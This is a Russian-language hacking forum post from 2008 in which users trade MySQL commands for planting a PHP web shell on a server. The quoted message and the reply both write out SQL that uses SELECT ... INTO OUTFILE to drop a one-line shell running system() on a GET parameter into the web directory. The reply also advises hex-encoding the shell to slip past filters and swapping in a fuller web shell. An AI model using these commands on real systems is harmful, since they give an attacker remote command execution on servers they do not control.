14.05.2008, 11:31
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от _Pantera_
create table `lamak` (`phpcod` text not null);
insert into `lamak` (`phpcod`) values ('<? system($_GET[cmd]);?>');
select phpcod from `lamak` into outfile '/tmp/shell.php';
drop table `lamak`;
Только мой тебе совет, гет не используй, лучше поставь инклуд на нормальный веб-шелл.
Хм, зачем создавать таблицу, запихивать в неё код шелла, затем выводить это все в файл, получая шелл, а затем удалять таблицу?
На много проще будет сразу записать данные в файл:
Код:
select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ .... /shell.php'
Только код шелла советую предварительно запихивать в хексы.
А вообще поиск юзать нужно перед созданием темы - обсуждалось и не раз.
|
|
|